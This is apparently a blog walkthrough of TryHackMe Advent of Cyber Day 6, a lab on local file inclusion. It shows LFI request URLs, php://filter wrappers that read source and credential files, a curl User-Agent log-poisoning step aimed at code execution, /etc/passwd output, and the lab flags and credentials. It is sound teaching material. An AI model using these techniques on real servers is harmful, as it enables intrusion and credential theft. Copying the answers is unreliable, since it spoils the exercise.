Get started with Cyber Security in 25 days, by learning the
basics and completing a new, beginner friendly security exercise every day
leading up until Christmas; an advent calendar but with security challenges
and not chocolate.
Hey Guys! Sorry for the delay but, we are
back with Day 6 of the “ Advent of Cyber” event by TryHackMe. If you haven’t solved the
Day 5 challenge click here.
This challenge is again based on
Web Exploitation and the task is named
Patch Management is Hard
DAY 6
Story
During a routine
security audit before the Incident,
McSkidy discovered some recovery passwords on an old server. She
created a ticket to decommission this server to reduce this security
vulnerability. The Elf assigned to fix this vulnerability kept pushing off the
task, and this never got done. Luckily, some of those recovery keys can be
used to save some systems.
Unfortunately, the only way to access
the server is through an old web application. See if you can pull out those
recovery keys to help McSkidy with her pursuit to save
Christmas.
Learning Objectives of the day
- What is LFI?
- How to perform LFI?
- How to elevate from LFI to RCE?
Let us understand the concepts targeted for today first!
What is LFI?
An LFI vulnerability is found in various web applications.
As an example, in the PHP, the following functions cause this kind of
vulnerability:
- include
- require
- include_once
- require_once
It is a web
application vulnerability that allows the attacker to include and read local
files on the server. These files could contain sensitive data such as
cryptographic keys, databases that contain passwords, and other private data.
An LFI vulnerability happens due to a developer’s
lack of security awareness. In some cases, developers need to include the
content of other local files within a specific page. Suppose a developer
includes files without proper input validation. In that case, the
LFI vulnerability will exist as a developer should
never trust user input and keep all inputs from users to be filtered and
sanitized. The main issue of these vulnerabilities is the lack of input
validation, in which the user inputs are not sanitized or validated, and the
user controls them.
You should read the content given with
the challenge for the best understanding of LFI
Q1.Deploy the attached VM and look around. What is the entry point
for our web application?
Ans :- err
Q2.Use the entry point to perform LFI to read the /etc/flag file. What is
the flag?
We first go to our entry point and replace the error.txt file
with ‘/etc/passwd’ file just to check if we can get it!
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh mysql:x:101:102:MySQL Server,,,:/nonexistent:/bin/false
Yes we have access, but normally we shouldn’t have that!
Now we check for /etc/flag and voila!
Ans :- THM{d29e08941cf7fe41df55f1a7da6c4c06}
Q3.Use the PHP filter technique to read the source code of the index.php.
What is the $flag variable’s value?
We use the PHP filter technique to read the code for index.php by
using :
php://filter/convert.base64-encode/resource=
https://10-10-247-133.p.thmlabs.com/index.php?err=php://filter/convert.base64-encode/resource=index.php
Once we find the base64 encoding for it, we go to
https://www.base64decode.org/ and decode it for our answer!
Or
You can use the base64 command in terminal...
echo "aplhanumeric character" | base64 -d
echo "PD9waHAgc2Vzc2lvbl9zdGFydCgpOwokZmxhZyA9ICJUSE17NzkxZDQzZDQ2MDE4YTBkODkzNjFkYmY2MGQ1ZDllYjh9IjsKaW5jbHVkZSgiLi9pbmNsdWRlcy9jcmVkcy5waHAiKTsKaWYoJF9TRVNTSU9OWyd1c2VybmFtZSddID09PSAkVVNFUil7ICAgICAgICAgICAgICAgICAgICAgICAgCgloZWFkZXIoICdMb2NhdGlvbjogbWFuYWdlLnBocCcgKTsKCWRpZSgpOwp9IGVsc2UgewoJJGxhYk51bSA9ICIiOwogIHJlcXVpcmUgIi4vaW5jbHVkZXMvaGVhZGVyLnBocCI7Cj8+CjxkaXYgY2xhc3M9InJvdyI+CiAgPGRpdiBjbGFzcz0iY29sLWxnLTEyIj4KICA8L2Rpdj4KICA8ZGl2IGNsYXNzPSJjb2wtbGctOCBjb2wtb2Zmc2V0LTEiPgogICAgICA8P3BocCBpZiAoaXNzZXQoJGVycm9yKSkgeyA/PgogICAgICAgICAgPHNwYW4gY2xhc3M9InRleHQgdGV4dC1kYW5nZXIiPjxiPjw/cGhwIGVjaG8gJGVycm9yOyA/PjwvYj48L3NwYW4+CiAgICAgIDw/cGhwIH0KCj8+CiA8cD5XZWxjb21lIDw/cGhwIGVjaG8gZ2V0VXNlck5hbWUoKTsgPz48L3A+Cgk8ZGl2IGNsYXNzPSJhbGVydCBhbGVydC1kYW5nZXIiIHJvbGU9ImFsZXJ0Ij5UaGlzIHNlcnZlciBoYXMgc2Vuc2l0aXZlIGluZm9ybWF0aW9uLiBOb3RlIEFsbCBhY3Rpb25zIHRvIHRoaXMgc2VydmVyIGFyZSBsb2dnZWQgaW4hPC9kaXY+IAoJPC9kaXY+Cjw/cGhwIGlmKCRlcnJJbmNsdWRlKXsgaW5jbHVkZSgkX0dFVFsnZXJyJ10pO30gPz4KPC9kaXY+Cgo8P3BocAp9Cj8+</div>" | base64 -d
Answer :- THM{791d43d46018a0d89361dbf60d5d9eb8}
Q4.McSkidy forgot his login credential. Can you help him to login in order
to recover one of the server’s passwords?
Now that you read the index.php, there is a login credential PHP
file’s path. Use the PHP filter technique to read its content. What are the
username and password?
Using the same base64 encoding of index.php file, we also see
that there is ./includes/creds.php which has the credentials.
https://10-10-231-193.p.thmlabs.com/index.php?err=php://filter/convert.base64-encode/resource=./includes/creds.php
We do the same process and use the PHP filter process to go to this file and
then decode it and get the credentials!
Answer:- McSkidy:A0C315Aw3s0m
Q5.Use the credentials to login into the web application. Help McSkidy to
recover the server’s password. What is the password of the flag.thm.aoc
server?
We have the username and password, we login and we see a fe
options!
We know we have to recover the password, so we go on password recovery
Answer:- THM{552f313b52e3c3dbf5257d8c6db7f6f1}
Q6.The web application logs all users’ requests, and only authorized users
can read the log file. Use the LFI to gain RCE via the log file page. What
is the hostname of the webserver? The log file location is at
./includes/logs/app_access.log.
We send in a CURL command in order to test the logs and see how it
shows.
curl -A "TESTIN TESTING"
http://10-10-88-123.p.thmlabs.com/login.php
the “-A” option helps
us set the User Agent and we see TESTIN TESTING as user agent
Now,
we do the same, instead with a little php payload to display the phpinfo!
Now to check the log file we need to go to
“./includes/logs/app_access.log”, but, for that, we need to go to
another window where we a re not logged in to actually check it!
And we see the PHP info file in the logs!!!!!
We can see the
hostname directly in the phpinfo in the System column
Answer:- lfi-aoc-awesome-59aedca683fff9261263bb084880c965
The
question does ask for RCE, but the this task can be completed without RCE!
Disclaimer
All tutorials are for informational and educational purposes only and have
been made using our own routers, servers, websites and other vulnerable free
resources. we do not contain any illegal activity. We believe that ethical
hacking, information security and cyber security should be familiar subjects
to anyone using digital information and computers. Hacking Truth is against
misuse of the information and we strongly suggest against it. Please regard
the word hacking as ethical hacking or penetration testing every time this
word is used. We do not promote, encourage, support or excite any illegal
activity or hacking.